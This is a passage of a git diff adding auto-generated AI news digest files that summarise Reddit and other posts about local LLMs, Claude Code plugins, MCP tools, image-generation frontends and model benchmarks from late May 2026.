I've even added 1-click Windo… + +--- + +## [got tired of claude code forgetting everything every session, built VIR for it](https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.86 +Tags: mcp, cli_tool + +> Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \`\`\` vir query "what gotchas have i hit with auth" \`\`\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux… + +--- + +## [Four calls became one: letting the agent author tools mid-session](https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. 
Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho… + +--- + +## [Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.](https://www.digg.com/ai/esmbs3o1?rank=8) +*Digg AI* | Score: 1.00 +Tags: product_launch + +--- + +## [SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.](https://www.digg.com/ai/h7rp9igv?rank=6) +*Digg AI* | Score: 1.00 +Tags: agent_tool + +--- + +## [What features do you wish ComfyUI or A1111 had?](https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: open_source + +> TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, 
tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im… + +--- + +## [GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.](https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/) +*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. 
The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach. + +--- + +## [Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.](https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a "don't call any tool" trap). 5 mock tools. Three metrics per run: parse\_success, tool\_match, args\_match. Same queries, same eval rubric, same hardware. Headline numbers (Needle 26M vs Qwen3 0.6B): tool\_match overall 72.0% vs 56.0%; parse\_success 84.0% vs 54.0%; args\_match | match 97.2% vs 100.0%; mean latency 10.9s vs 47.9s. The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\_web instead of run\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. 
When it does emi… + +--- + +## [GPT 5.5 "secret sauce" is just having the thinking be some stupid caveman mode?](https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: open_source + +> I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, "caveman-izing" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time + +--- + +## [My experience using Claude code with Local Llm, and full guide on how to set it up](https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/) +*Reddit r/ClaudeAI* | 23/05/2026 | Score: 1.00 +Tags: api_update + +> Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \`ollama pull <model>\` — \~9 GB for a 14B, \~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. 
Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a… + +--- + +## [Removing Vision from model](https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/) +*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 +Tags: agent_tool + +> I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding + +--- + diff --git a/data/digest-2026-05-24.md b/data/digest-2026-05-24.md new file mode 100644 index 0000000..7c969dc --- /dev/null +++ b/data/digest-2026-05-24.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-24** | 15 stories | Auto-generated from 365 archived stories + +--- + +## [I built a local GUI for the TradingAgents framework — works with Ollama](https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, cli_tool, tool_update + +> https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen "agents" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. 
Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A "report length" knob (Concise / Standard / Comprehensive) — concise mode saves \~50% tokens * Multi-session chat where you can pin past report… + +--- + +## [VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation](https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.94 +Tags: api_update, developer_tool, cli_tool + +> # I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \*\*VRAM Suite\*\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. 
# What works now * CLI command: \`vramsuite doctor\` * Public Python API: \`import vramsuite\` * Structured doctor API: \`run\_doctor()\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \`ctypes\` * Driver-level total/free/used VRAM without requiring PyTorch * \`.vramcard\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \`--estimate-mb\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50… + +--- + +## [Claude working autonomously](https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: api_update, mcp, developer_tool + +> Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system + +--- + +## [Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks](https://x.com/alessandro_a0/status/2058278886572433812) +*Aligned News (Scoble)* | 24/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement. + +--- + +## [Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]](https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> At our work we use CUDA in Rust since the company switched to it recently. 
Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()… + +--- + +## [PapersWithCode new features - week 1 [P]](https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. 
This week, I've added the following features: \- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \- Su… + +--- + +## [Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)](https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\_k\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! 
- telegram text update + ascii/screenshots on milestones or errors \- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late… + +--- + +## [How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui](https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: cli_tool, agent_tool + +> As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\_shell\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. 
"virtual machine agent smith") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it… + +--- + +## [48 frontends for Comfy!](https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 1.00 +Tags: api_update, tool_update + +> This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\_bsk\_UI 13. OutSweeper 14. 
Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.… + +--- + +## [🚀 Skills for small businesses, officially released by Anthropic](https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: developer_tool, agent_tool + +> Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins + +--- + +## [Claude code - Cultivate your context window to get the max out of your tokens](https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 +Tags: api_update, mcp + +> Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. 
if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \~/.claude/[CLAUDE.md](http://c… + +--- + +## [LongCat-Video-Avatar 1.5 Release](https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/) +*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.78 +Tags: open_source, developer_tool + +> HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. 
# [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactio… + +--- + +## [Claude records demo videos for me now](https://reddit.com/r/ClaudeAI/comments/1tmkee4/claude_records_demo_videos_for_me_now/) +*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.62 +Tags: open_source, tool_update + +> I hate recording demo videos, so I made an open source skill for it: [https://github.com/MobAI-App/desktop-recorder-skill](https://github.com/MobAI-App/desktop-recorder-skill) Now I can give Claude a prompt like: Record a short demo of this app flow And it handles the annoying parts for me: preparing the app state, clicking through the flow, recording, adding cursor/click effects and captions, then exporting the video. So instead of spending time setting everything up and recording the same demo manually, I can let Claude do it while I work on something else. It also has Remotion integration, so Claude can generate more polished and editable videos from the recording, not just raw screen captures. The video attached to this post is the result of the skill itself. 
Also working on the same idea for mobile apps: [https://github.com/MobAI-App/mobile-recorder-skill](https://github.com/MobAI-App/mobile-recorder-skill) + +--- + +## [hipEngine: Fast Native Qwen 3.6 Inference for RDNA3 (Strix Halo, 7900 XTX)](https://reddit.com/r/LocalLLaMA/comments/1tmq4s6/hipengine_fast_native_qwen_36_inference_for_rdna3/) +*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 +Tags: open_source + +> A few weeks ago, after finishing [FastDMS](https://www.reddit.com/r/LocalLLaMA/comments/1t3vlrx/fastdms_64x_kvcache_compression_running_faster/), I started toying around writing some RDNA3 kernels again to see how fast I could get Qwen 3.6 MoE running. It turned out well enough, so over the past couple weeks, I turned those experiments into [hipEngine](https://github.com/shisa-ai/hipEngine), a new open source (AGPLv3) ROCm-native local LLM inference engine. It's Python based, but with no heavy PyTorch dependency. All the hot-path is HIP/C++, making liberal use of AMD native libs like hipBLASLt, hipGraph, AOTriton, etc. 
### gfx1100 (Radeon RX 7900 XTX / Radeon Pro W7900) The initial implementation has Qwen 3.6 (MoE and dense) running competitively with llama.cpp, with the [ParoQuant](https://github.com/shisa-ai/paroquant) (which I've also ported to be ROCm compatible) 4.68bpw having better c=1 prefill ("prompt processing") at every tested context length, from 512-128K on gfx1100 (W7900/7900 XTX): ### Prefill tok/s | Workload | hipEngine PARO | hipEngine GGUF Q4_K_S | llama.cpp HIP | llama.cpp Vulkan | | --- | ---: | ---: | ---: | ---: | | 512/128 | **2718.497** | 2258.847 | 2436.04… + +--- + +## [MergeNB: An intuitive merge conflict resolver built for Jupyter notebooks in VS Code [P]](https://reddit.com/r/MachineLearning/comments/1tmq1eb/mergenb_an_intuitive_merge_conflict_resolver/) +*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 +Tags: developer_tool + +> I used to work heavily with Jupyter Notebooks + git + VS Code in a collaborative research setting and found nbdime to be somewhat buggy/a hassle to work with in general. So, in typical side project fashion ([relevant xkcd](https://xkcd.com/1319/)) I've been working on MergeNB quite a bit over the last 6 months or so. It's (currently only) a VS Code extension with a web UI, and has a few cool improvements over other alternatives, which I outlined in the README/docs site. I'd be over the moon if this actually gets used by people, and would love a star if it's interesting. See [https://github.com/Avni2000/MergeNB](http://github.com/Avni2000/MergeNB). 
I've also been working on a static documentation site here: [https://avni2000.github.io/MergeNB/docs](https://avni2000.github.io/MergeNB/docs) I'm planning on working on it a lot more over the summer and properly fleshing out a few of the ideas I had (including making it a git mergetool as well as a VS Code extension), so if you'd like to contribute, feel free to raise an issue or shoot me a message/email :) + +--- + diff --git a/data/digest-2026-05-25.md b/data/digest-2026-05-25.md new file mode 100644 index 0000000..2052675 --- /dev/null +++ b/data/digest-2026-05-25.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-05-25** | 15 stories | Auto-generated from 588 archived stories + +--- + +## [I made a local-first MCP tutorial repo with node-llama-cpp and a custom agent loop](https://reddit.com/r/LocalLLaMA/comments/1tn1jjy/i_made_a_localfirst_mcp_tutorial_repo_with/) +*Reddit r/LocalLLaMA* | 25/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update + +> I just published a repo called MCP from Scratch that teaches the Model Context Protocol by building it step by step in plain Node.js. Most of the repo is about understanding MCP itself, but the later modules may be relevant here: I added a local-first setup using `node-llama-cpp`, GGUF models, MCP sampling, and a custom plan -> act -> observe agent loop. So the repo goes from: * raw JSON-RPC and stdio transport * to a working MCP server with tools/resources/prompts * to local model integration * to an agent loop that uses MCP tools with a local GGUF model There’s also an optional LangChain example, but the main path is intentionally minimal and tries to make the underlying mechanics obvious. 
Key points: * plain Node.js, minimal abstractions * designed as a learning repo, not a production SDK * uses shared local GGUF models for the later modules * built for people who want to understand what MCP tooling is actually doing under the hood Repo: [https://github.com/pguso/mcp-from-scratch](https://github.com/pguso/mcp-from-scratch) Would especially love feedback from people here on the local inference side: * model choice * whether the agent loop examples feel useful or too toy-ish + +--- + +## [I stress-tested Kimi K2.6 against Claude Opus 4.7 on a quick coding-agent task](https://reddit.com/r/ClaudeAI/comments/1tn9fpq/i_stresstested_kimi_k26_against_claude_opus_47_on/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 +Tags: api_update, open_source, tool_update, agent_tool + +> I tested Claude Opus 4.7 and Kimi K2.6 on the same coding agent task i.e. build an AI Fix Runner that takes a broken repo, runs its tests, identifies the failure, applies a patch, reruns the test, and exposes the final diff/logs through an API and UI. The goal was not to benchmark syntax completion or simple repo edits. I wanted to test model behavior on a less familiar integration path: shifting execution from local processes into remote sandboxes. I used Tensorlake specifically because the sandbox API is newer and integration-heavy. This made the test more about whether the model could reason through unfamiliar infra and produce a working implementation. Setup: * Claude Opus 4.7 through Claude Code * Kimi K2.6 through OpenCode via OpenRouter Pricing context: * Claude Opus 4.7: $5/M input, $25/M output * Kimi K2.6: $0.95/M input ($0.16 cached input), $4/M output So, what made it interesting is if Kimi's lower cost can handle a crazy workflow. To be clear, comparing Kimi K2.6 directly with Opus 4.7 is not completely fair. The model classes, pricing, and expected capability levels are very different. 
I mainly wanted to see how far an open model could get on the same task at a fract… + +--- + +## [Workbench Launches Open Source BullMQ Dashboard For Node Backends](https://x.com/pontusab/status/2058588422001029549) +*Aligned News (Scoble)* | 25/05/2026 | Score: 1.00 +Tags: product_launch, open_source, tool_update + +> Workbench launched as an open-source BullMQ dashboard with flows, metrics, schedulers, and search for Node backends. + +--- + +## [Ditched GitHub Copilot yearly subscription. What's the best way to run Claude nowadays?](https://reddit.com/r/ClaudeAI/comments/1tnl23a/ditched_github_copilot_yearly_subscription_whats/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 0.94 +Tags: api_update, developer_tool, cli_tool + +> Hey everyone, I recently cancelled my yearly GitHub Copilot subscription. My old workflow was simple: I used the GitHub Copilot extension in VS Code, but I swapped the backend model to Sonnet / Opus and relied heavily on the `/plan` command to code. I absolutely loved it and I would like that exact flow back. My plan was to just go full Bring Your Own Key (BYOK) inside VS Code using an API key and pay per token for Sonnet or Opus. However, I’m seeing all this hype around CLI tools, and it has me second-guessing my setup. I’m completely open to trying new workflows if they are a massive upgrade, but honestly, I’d be much happier just staying in my cozy VS Code environment if the math makes sense. so my questions are: 1. Is a flat Claude subscription actually cheaper than an API key for heavy coding? In my old copilot plan I believe just once I used all my tokens per month. 2. How bad is the token bleed if I stick to BYOK? I heard with CLI you make some markdown files and things get cheaper / faster. Can you do that with BYOK as well? thanks for any advice! 
+ +--- + +## [I built a meme-y social feed for programmers that lives inside Claude Code (and Cursor, and Copilot CLI)](https://reddit.com/r/ClaudeAI/comments/1tnlji5/i_built_a_memey_social_feed_for_programmers_that/) +*Reddit r/ClaudeAI* | 25/05/2026 | Score: 1.00 +Tags: developer_tool, cli_tool + +> I spend hours every day in Claude Code, but I started feeling weirdly isolated. So I built a tiny social network that lives inside it. WAYD ("What Are You Doing?") is a Claude Code skill. You type `/wayd` and either post a short "vibe" about your coding day or scroll a random feed of what other developers are losing their minds over. React with emojis, drop a one-line reply, get back to work. The whole thing runs on GitHub Issues as the silent backend. No server, no database, no signup, just your existing `gh` CLI. You never see issues, JSON, or `gh` commands; the skill orchestrates everything in the background. It feels like a tiny social app inside the terminal. 8 vibe-tags to pick from when you post: 🤡 cursed-code, 🪦 rip-me, 🫠 brain-melt, 🧙 dark-arts, 🔥 hot-take, 💭 shower-thought, 🤔 existential, ☕ procrastinating. Each is a mood, not a topic. Write up to 1000 chars, publish under your real GitHub handle, scroll a random feed of strangers doing the same. **Install on Claude Code**: claude plugin marketplace add ferdinandobons/wayd claude plugin install wayd@wayd Other install methods + screenshots: [https://github.com/ferdinandobons/wayd](https://github.com/ferdinandobons… + +--- + +## [Is AI inference platform really that saturated now? [D]](https://reddit.com/r/MachineLearning/comments/1tngk7p/is_ai_inference_platform_really_that_saturated/) +*Reddit r/MachineLearning* | 25/05/2026 | Score: 1.00 +Tags: 